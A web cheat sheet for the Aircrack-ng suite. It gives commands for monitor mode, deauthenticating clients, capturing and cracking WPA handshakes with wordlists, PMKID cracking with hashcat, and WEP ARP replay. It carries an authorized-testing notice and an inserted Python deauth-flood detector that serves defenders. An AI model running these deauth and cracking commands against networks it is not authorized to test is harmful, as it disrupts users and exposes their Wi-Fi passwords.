CyberCheatsheets

Aircrack-ng Cheat Sheet

Wi-Fi security auditing suite — capture with airodump-ng, deauth with aireplay-ng, crack WPA with aircrack-ng.

Tags: Wireless, aireplay, airodump, wifi, wpa. Updated 2026-06-02

Overview

Aircrack-ng captures 802.11 traffic, recovers WEP keys and cracks WPA handshakes offline. Typical workflow: airodump-ng (capture) → aireplay-ng (deauth to force a handshake) → aircrack-ng (offline crack with a wordlist). Requires a monitor-mode capable adapter and legal authorization.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

sudo apt install -y aircrack-ng

Driver must support monitor mode (check: iw list | grep monitor)

sudo airmon-ng check kill   # may disrupt NetworkManager

Essential commands

Enable monitor interface

sudo airmon-ng start wlan0

Scan networks

sudo airodump-ng wlan0mon

Capture on channel for target BSSID

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Common workflows

Terminal 1 — capture (channel 6 example)

sudo airodump-ng -c 6 --bssid TARGET_BSSID -w handshake wlan0mon

Terminal 2 — deauth client to force 4-way handshake

sudo aireplay-ng -0 5 -a TARGET_BSSID -c CLIENT_MAC wlan0mon
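The deauth step above is also the signal a wireless IDS watches for. As an added example (not from the cheat sheet or the aircrack-ng project), this Python script parses raw 802.11 management frames as they appear in a monitor-mode capture and flags any transmitter that emits a burst of deauthentication frames; the frames, MAC addresses and the 5-in-2-seconds threshold are all constructed here.

```python
"""Deauth-flood detector for 802.11 management frames (added example for
defenders; not from the cheat sheet or the aircrack-ng project).
Flags any transmitter sending >= THRESHOLD deauths within WINDOW_S seconds,
the pattern 'aireplay-ng -0' leaves in a monitor-mode capture."""
import struct
from collections import defaultdict

DEAUTH_FC, BEACON_FC = 0xC0, 0x80  # frame-control byte 0: mgmt subtype 12 / 8
THRESHOLD, WINDOW_S = 5, 2.0       # >= 5 deauths from one sender in 2 s

def _mac(mac):
    return bytes.fromhex(mac.replace(":", ""))

def build_mgmt_frame(fc0, dst, src, bssid, body=b""):
    """Minimal 802.11 mgmt frame: FC, duration, addr1-3, seq ctrl, body."""
    return (struct.pack("<BBH", fc0, 0, 0) + _mac(dst) + _mac(src) + _mac(bssid)
            + struct.pack("<H", 0) + body)

def parse_deauth(frame):
    """Return (src, dst, reason_code) for a deauth frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC:
        return None
    reason = struct.unpack_from("<H", frame, 24)[0]  # body is a 2-byte reason
    return frame[10:16].hex(":"), frame[4:10].hex(":"), reason

def detect_deauth_flood(timed_frames, threshold=THRESHOLD, window_s=WINDOW_S):
    """timed_frames: iterable of (timestamp_s, raw_frame). Returns
    {src_mac: peak_deauths_in_window} for senders that exceed the rate."""
    recent, flagged = defaultdict(list), {}
    for ts, frame in sorted(timed_frames, key=lambda tf: tf[0]):
        parsed = parse_deauth(frame)
        if parsed is None:
            continue                      # beacons, probes, data: ignored
        times = recent[parsed[0]]
        times.append(ts)
        while ts - times[0] > window_s:   # drop deauths older than the window
            times.pop(0)
        if len(times) >= threshold:
            flagged[parsed[0]] = max(flagged.get(parsed[0], 0), len(times))
    return flagged

# Constructed sample: a beacon, five spoofed deauths (AP -> client, reason 7)
# inside half a second, and one isolated deauth from an unrelated AP.
AP, CLIENT, OTHER = "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66", "de:ad:be:ef:00:01"
SAMPLE = [(0.0, build_mgmt_frame(BEACON_FC, "ff:ff:ff:ff:ff:ff", AP, AP))]
SAMPLE += [(1.0 + i / 10, build_mgmt_frame(DEAUTH_FC, CLIENT, AP, AP,
            struct.pack("<H", 7))) for i in range(5)]
SAMPLE.append((30.0, build_mgmt_frame(DEAUTH_FC, CLIENT, OTHER, OTHER,
               struct.pack("<H", 3))))

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE))   # {'aa:bb:cc:dd:ee:ff': 5}
```

Isolated deauths from idle timeouts or roaming are normal, so tune the threshold to the environment before alerting on it. The flagged address is the transmitter field of the forged frame, which names the impersonated AP, not the device that injected it.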

With wordlist

aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap

Specify ESSID if needed

aircrack-ng -w wordlist.txt -e "NetworkName" handshake-01.cap

PMKID (hashcat often faster) — hcxtools

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool -o hash.22000 pmkid.pcapng
hashcat -m 22000 hash.22000 wordlist.txt

WEP (legacy labs only)

sudo airodump-ng -c 1 --bssid AP -w wep wlan0mon
sudo aireplay-ng -3 -b AP -h FAKE_MAC wlan0mon   # ARP replay
aircrack-ng wep-01.cap

Cleanup

sudo airmon-ng stop wlan0mon
sudo systemctl start NetworkManager

Flags: airmon-ng

airmon-ng start wlan0

Enable monitor mode (creates wlan0mon)

airmon-ng stop wlan0mon

Disable monitor mode

airmon-ng check kill

Stop processes that block monitor mode

Flags: airodump-ng

-c 6

Fixed channel

--bssid AA:BB:CC:DD:EE:FF

Capture only this access point

-w handshake

Output file prefix (handshake-01.cap, …)

wlan0mon

Monitor interface (last argument)

Flags: aireplay-ng

-0 5

Deauthentication attack, 5 packets

-a AA:BB:CC:DD:EE:FF

Access point (BSSID)

-c 11:22:33:44:55:66

Client MAC (optional)

Flags: aircrack-ng

-w /usr/share/wordlists/rockyou.txt

Wordlist for WPA-PSK

-e "NetworkName"

ESSID when several networks in the capture

-b AA:BB:CC:DD:EE:FF

BSSID when several APs in the .cap

Tips

  • Use 5 GHz only if adapter supports it (iw dev wlan0 scan | grep MHz).
  • No handshake without active clients — wait or deauth ethically within scope.
  • WPA3 / enterprise (802.1X) need different tools (hostapd-wpe, evil twin with caution).
  • Document channel, BSSID, and capture file hash for reporting.
